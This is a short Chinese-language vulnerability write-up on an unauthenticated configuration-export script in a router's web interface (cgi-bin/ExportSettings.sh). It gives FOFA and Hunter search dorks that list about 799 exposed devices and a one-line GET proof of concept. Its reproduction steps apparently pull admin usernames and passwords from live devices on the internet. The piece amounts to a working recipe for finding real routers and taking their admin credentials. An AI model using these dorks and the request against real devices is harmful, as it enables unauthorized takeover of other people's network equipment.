漏洞描述:
该漏洞由于cgi-bin/ExportSettings.sh未对用户进行身份验证,导致攻击者能够未授权获取到路由器设置信息,包含了后台管理员用户的账号和密码
fofa: title="互联世界 物联未来-登录"
鹰图: web.body="互联世界 物联未来-登录"
POC: GET /cgi-bin/ExportSettings.sh
漏洞复现:
fofa搜索,共有799条资产
访问资产IP,在URL后拼接/cgi-bin/ExportSettings.sh,可以下载信息文件
使用记事本查看,获取到了管理员登录账号和密码
